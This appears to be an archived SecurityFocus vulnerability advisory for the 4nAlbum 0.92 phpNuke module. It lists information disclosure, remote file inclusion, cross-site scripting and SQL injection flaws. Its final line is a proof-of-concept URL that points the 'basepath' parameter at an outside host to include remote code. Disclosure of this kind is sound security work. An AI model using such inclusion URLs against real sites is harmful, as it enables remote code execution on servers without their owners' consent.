15 lines
No EOL
898 B
Text
15 lines
No EOL
898 B
Text
source: https://www.securityfocus.com/bid/9881/info
|
|
|
|
It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input.
|
|
|
|
There is an information disclosure issue with the 'displaycategory.php' script.
|
|
|
|
There is a remote file inclusion vulnerability in the 'displaycategory.php' script.
|
|
|
|
A cross-site scripting vulnerability in the 'nmimage.php' script has also been reported.
|
|
|
|
Finally an SQL injection vulnerability has been reported. This issue may be leveraged through the 'modules.php' script of phpNuke while requesting the 'index' file of the 4nAlbum module.
|
|
|
|
This issue has been reported to affect version 0.92 of the software. It is quite likely that other versions are affected as well.
|
|
|
|
http://www.example.com/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http://www.example.net/ |